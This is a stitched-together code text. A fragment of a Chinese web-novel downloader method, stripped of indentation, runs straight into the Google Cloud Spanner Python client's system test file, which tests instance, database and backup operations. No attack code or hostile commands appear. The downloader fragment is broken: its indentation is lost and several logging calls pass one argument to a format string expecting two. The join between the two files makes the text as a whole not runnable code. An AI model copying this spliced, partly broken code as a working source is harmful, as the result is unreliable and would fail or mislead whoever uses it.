self.L.debug("图书下载: %d: URL %s" % (book_id, book_url))
__, html, soup = reqr(True, 'get', book_url)
table = soup.select('table')
if len(table) == 0:
self.L.error("图书下载: %d: 找不到内容,返回页面为 %s" % html)
return False
table = table[0]
if len(soup.select("#title")) == 0:
self.L.error("图书下载: %d: 找不到标题,返回页面为 %s" % html)
return
title = soup.select("#title")[0].get_text()
author = soup.select("#info")[0].get_text().split('作者:')[-1]
url_cover = API['img'] % (("%04d" % book_id)[0], book_id, book_id)
if OPT['simplifyTitle']:
title = re.sub(r"\(.*?\)", "", title)
book_info['name'] = re.sub(r"\(.*?\)", "", book_info['name'])
        self.L.debug('Book download %d: title %s, author %s' % (book_id, title, author))
iscopyright = '因版权问题,文库不再提供该小说的在线阅读与下载服务!' not in soup.get_text()
if not iscopyright:
            self.L.error('Book download: %s: removed for copyright reasons; download aborted.', title)
return False
A = [i for i in filter(lambda x : x.get_text().encode() != b'\xc2\xa0', table.select('td'))]
trs = [i[0] for i in filter(lambda x : len(x[1].select('a')) == 0, enumerate(A))]
self.L.debug("分卷数: %d 页面数: %d" % (len(A), len(trs)))
self.L.info('图书下载: %d [%s] %s 共 %d 分卷' % (book_id, author, title, len(trs)))
for ind, tr in enumerate(trs):
subtitle = A[tr].get_text()
self.L.debug("分卷 %d 页面范围 %d - %d" % (ind + 1, tr+2, len(A) if ind == len(trs) - 1 else trs[ind + 1]))
hrefs = [i.select('a')[0] for i in (A[tr+1:] if ind == len(trs) - 1 else A[tr+1:trs[ind+1]])]
self.get_volume(book_id, book_info, ind, hrefs, subtitle, title, author, url_cover)
return True
|
test_system.py
|
# Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1 import TypeCode
from google.cloud.spanner_v1 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner_v1 import BurstyPool
from google.cloud.spanner_v1 import COMMIT_TIMESTAMP
from google.cloud.spanner_v1 import Client
from google.cloud.spanner_v1 import KeyRange
from google.cloud.spanner_v1 import KeySet
from google.cloud.spanner_v1.instance import Backup
from google.cloud.spanner_v1.instance import Instance
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
from tests._fixtures import EMULATOR_DDL_STATEMENTS
from tests._helpers import OpenTelemetryBase, HAS_OPENTELEMETRY_INSTALLED
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
SKIP_BACKUP_TESTS = os.getenv("SKIP_BACKUP_TESTS") is not None
SPANNER_OPERATION_TIMEOUT_IN_SECONDS = int(
os.getenv("SPANNER_OPERATION_TIMEOUT_IN_SECONDS", 60)
)
if CREATE_INSTANCE:
INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
INSTANCE_ID = os.environ.get(
"GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
)
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
BASE_ATTRIBUTES = {
"db.type": "spanner",
"db.url": "spanner.googleapis.com",
"net.host.name": "spanner.googleapis.com",
}
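# Maps numeric protobuf status codes to grpc.StatusCode members; each member's
# .value is a (code, description) tuple, so value[0] is the numeric code.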
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _has_all_ddl(database):
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
return len(database.ddl_statements) == len(ddl_statements)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
if USE_EMULATOR:
from google.auth.credentials import AnonymousCredentials
emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
Config.CLIENT = Client(
project=emulator_project, credentials=AnonymousCredentials()
)
else:
Config.CLIENT = Client()
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
# Delete test instances that are older than an hour.
cutoff = int(time.time()) - 1 * 60 * 60
instance_pbs = Config.CLIENT.list_instances("labels.python-spanner-systests:true")
for instance_pb in instance_pbs:
instance = Instance.from_pb(instance_pb, Config.CLIENT)
if "created" not in instance.labels:
continue
create_time = int(instance.labels["created"])
if create_time > cutoff:
continue
# Instance cannot be deleted while backups exist.
for backup_pb in instance.list_backups():
backup = Backup.from_pb(backup_pb, instance)
backup.delete()
instance.delete()
if CREATE_INSTANCE:
if not USE_EMULATOR:
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if "-us-" in config.name]
if not configs:
raise ValueError("List instance configs failed in module set up.")
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
Config.INSTANCE = Config.CLIENT.instance(
INSTANCE_ID, config_name, labels=labels
)
created_op = Config.INSTANCE.create()
created_op.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
@unittest.skipIf(
CREATE_INSTANCE, "This test fails when system tests are run in parallel."
)
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (
instance in EXISTING_INSTANCES or instance == Config.INSTANCE
)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(INSTANCE_ID)
# Make sure metadata unset before reloading.
instance.display_name = None
def _expected_display_name(instance):
return instance.display_name == Config.INSTANCE.display_name
retry = RetryInstanceState(_expected_display_name)
retry(instance.reload)()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
        # Create a new instance object and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
@unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = "Foo Bar Baz"
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
        # Create a new instance object and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = "contacts"
COLUMNS = ("contact_id", "first_name", "last_name", "email")
ROW_DATA = (
(1, u"Phred", u"Phlyntstone", u"[email protected]"),
(2, u"Bharney", u"Rhubble", u"[email protected]"),
(3, u"Wylma", u"Phlyntstone", u"[email protected]"),
)
ALL = KeySet(all_=True)
SQL = "SELECT * FROM contacts ORDER BY contact_id"
_recurse_into_lists = True
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, DatetimeWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_rows_data(self, rows_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(rows_data), len(expected))
for row, expected in zip(rows_data, expected):
self._check_row_data(row, expected)
def _check_row_data(self, row_data, expected):
self.assertEqual(len(row_data), len(expected))
for found_cell, expected_cell in zip(row_data, expected):
self._check_cell_data(found_cell, expected_cell)
def _check_cell_data(self, found_cell, expected_cell):
if isinstance(found_cell, DatetimeWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
elif isinstance(found_cell, list) and self._recurse_into_lists:
self.assertEqual(len(found_cell), len(expected_cell))
for found_item, expected_item in zip(found_cell, expected_cell):
self._check_cell_data(found_item, expected_item)
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
database_names = [
database.name for database in Config.INSTANCE.list_databases()
]
self.assertTrue(self._db.name in database_names)
def test_create_database(self):
pool = BurstyPool(labels={"testcase": "create_database"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_create_database_pitr_invalid_retention_period(self):
pool = BurstyPool(labels={"testcase": "create_database_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "0d"
ddl_statements = [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
temp_db = Config.INSTANCE.database(
temp_db_id, pool=pool, ddl_statements=ddl_statements
)
with self.assertRaises(exceptions.InvalidArgument):
temp_db.create()
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_create_database_pitr_success(self):
pool = BurstyPool(labels={"testcase": "create_database_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "7d"
ddl_statements = [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
temp_db = Config.INSTANCE.database(
temp_db_id, pool=pool, ddl_statements=ddl_statements
)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
temp_db.reload()
self.assertEqual(temp_db.version_retention_period, retention_period)
with temp_db.snapshot() as snapshot:
results = snapshot.execute_sql(
"SELECT OPTION_VALUE AS version_retention_period "
"FROM INFORMATION_SCHEMA.DATABASE_OPTIONS "
"WHERE SCHEMA_NAME = '' AND OPTION_NAME = 'version_retention_period'"
)
for result in results:
self.assertEqual(result[0], retention_period)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout"
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
        # Random but short-ish; must always start with a letter.
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(ddl_statements, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_update_database_ddl_pitr_invalid(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "0d"
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
self.assertIsNone(temp_db.version_retention_period)
ddl_statements = DDL_STATEMENTS + [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
with self.assertRaises(exceptions.InvalidArgument):
temp_db.update_ddl(ddl_statements)
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_update_database_ddl_pitr_success(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "7d"
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
self.assertIsNone(temp_db.version_retention_period)
ddl_statements = DDL_STATEMENTS + [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
operation = temp_db.update_ddl(ddl_statements)
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(temp_db.version_retention_period, retention_period)
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name="id_1")
with self.assertRaises(exceptions.AlreadyExists):
self._db.run_in_transaction(_unit_of_work, name="id_1")
self._db.run_in_transaction(_unit_of_work, name="id_2")
with self._db.snapshot() as after:
rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
@unittest.skipIf(SKIP_BACKUP_TESTS, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
from datetime import datetime
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
db1 = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
cls._db = db1
cls._dbs = [db1, db2]
op1 = db1.create()
op2 = db2.create()
op1.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS) # raises on failure / timeout.
op2.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS) # raises on failure / timeout.
cls.database_version_time = datetime.utcnow().replace(tzinfo=UTC)
current_config = Config.INSTANCE.configuration_name
same_config_instance_id = "same-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._same_config_instance = Config.CLIENT.instance(
same_config_instance_id, current_config, labels=labels
)
op = cls._same_config_instance.create()
op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
cls._instances = [cls._same_config_instance]
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
diff_configs = [
config.name
for config in configs
if "-us-" in config.name and config.name is not current_config
]
cls._diff_config_instance = None
if len(diff_configs) > 0:
diff_config_instance_id = "diff-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._diff_config_instance = Config.CLIENT.instance(
diff_config_instance_id, diff_configs[0], labels=labels
)
op = cls._diff_config_instance.create()
op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
cls._instances.append(cls._diff_config_instance)
@classmethod
def tearDownClass(cls):
for db in cls._dbs:
db.drop()
for instance in cls._instances:
instance.delete()
def setUp(self):
self.to_delete = []
self.to_drop = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
for doomed in self.to_drop:
doomed.drop()
def test_create_invalid(self):
from datetime import datetime
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow()
expire_time = expire_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_backup_workflow(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(
backup_id,
database=self._db,
expire_time=expire_time,
version_time=self.database_version_time,
)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertEqual(expire_time, backup.expire_time)
self.assertIsNotNone(backup.create_time)
self.assertEqual(self.database_version_time, backup.version_time)
self.assertIsNotNone(backup.size_bytes)
self.assertIsNotNone(backup.state)
# Update with valid argument.
valid_expire_time = datetime.utcnow() + timedelta(days=7)
valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
backup.update_expire_time(valid_expire_time)
self.assertEqual(valid_expire_time, backup.expire_time)
# Restore database to same instance.
restored_id = "restored_db" + unique_resource_id("_")
database = instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
restored_db = operation.result()
self.assertEqual(
self.database_version_time,
restored_db.restore_info.backup_info.version_time,
)
metadata = operation.metadata
self.assertEqual(self.database_version_time, metadata.backup_info.version_time)
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_backup_version_time_defaults_to_create_time(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(backup_id, database=self._db, expire_time=expire_time,)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertIsNotNone(backup.create_time)
self.assertEqual(backup.create_time, backup.version_time)
backup.delete()
self.assertFalse(backup.exists())
def test_create_backup_invalid_version_time_past(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
version_time = datetime.utcnow() - timedelta(days=10)
version_time = version_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id,
database=self._db,
expire_time=expire_time,
version_time=version_time,
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_create_backup_invalid_version_time_future(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
version_time = datetime.utcnow() + timedelta(days=2)
version_time = version_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id,
database=self._db,
expire_time=expire_time,
version_time=version_time,
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_restore_to_diff_instance(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
op = backup.create()
self.to_delete.append(backup)
op.result()
# Restore database to different instance with same config.
restored_id = "restored_db" + unique_resource_id("_")
database = self._same_config_instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_multi_create_cancel_update_error_restore_errors(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
backup1 = instance.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time
)
backup2 = instance.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time
)
# Create two backups.
op1 = backup1.create()
op2 = backup2.create()
self.to_delete.extend([backup1, backup2])
backup1.reload()
self.assertFalse(backup1.is_ready())
backup2.reload()
self.assertFalse(backup2.is_ready())
# Cancel a create operation.
op2.cancel()
self.assertTrue(op2.cancelled())
op1.result()
backup1.reload()
self.assertTrue(backup1.is_ready())
# Update expire time to invalid value.
        invalid_expire_time = datetime.utcnow() + timedelta(days=366)
invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
with self.assertRaises(exceptions.InvalidArgument):
backup1.update_expire_time(invalid_expire_time)
# Restore to existing database.
with self.assertRaises(exceptions.AlreadyExists):
self._db.restore(source=backup1)
# Restore to instance with different config.
        if self._diff_config_instance is None:
            return
new_db = self._diff_config_instance.database("diff_config")
op = new_db.create()
op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
self.to_drop.append(new_db)
with self.assertRaises(exceptions.InvalidArgument):
new_db.restore(source=backup1)
def test_list_backups(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time_1 = datetime.utcnow() + timedelta(days=21)
expire_time_1 = expire_time_1.replace(tzinfo=UTC)
backup1 = Config.INSTANCE.backup(
backup_id_1,
database=self._dbs[0],
expire_time=expire_time_1,
version_time=self.database_version_time,
)
expire_time_2 = datetime.utcnow() + timedelta(days=1)
expire_time_2 = expire_time_2.replace(tzinfo=UTC)
backup2 = Config.INSTANCE.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time_2
)
# Create two backups.
op1 = backup1.create()
op1.result()
backup1.reload()
create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
backup2.create()
self.to_delete.extend([backup1, backup2])
# List backups filtered by state.
filter_ = "state:CREATING"
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by backup name.
filter_ = "name:{0}".format(backup_id_1)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by database name.
filter_ = "database:{0}".format(self._dbs[0].name)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by create time.
filter_ = 'create_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by version time.
filter_ = 'version_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by expire time.
filter_ = 'expire_time > "{0}"'.format(
expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by size bytes.
filter_ = "size_bytes < {0}".format(backup1.size_bytes)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups using pagination.
count = 0
for page in instance.list_backups(page_size=1):
count += 1
self.assertEqual(count, 2)
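# Shared fixture values for the "all_types" round-trip tests below.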
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
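# A NaN with a bit pattern distinct from float("nan"), to exercise NaN round-trips.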
(OTHER_NAN,) = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
NUMERIC_1 = decimal.Decimal("0.123456789")
NUMERIC_2 = decimal.Decimal("1234567890")
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
"pkey",
"int_value",
"int_array",
"bool_value",
"bool_array",
"bytes_value",
"bytes_array",
"date_value",
"date_array",
"float_value",
"float_array",
"string_value",
"string_array",
"timestamp_value",
"timestamp_array",
"numeric_value",
"numeric_array",
)
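# The emulator does not support NUMERIC, so drop the two trailing numeric columns.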
EMULATOR_ALL_TYPES_COLUMNS = ALL_TYPES_COLUMNS[:-2]
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
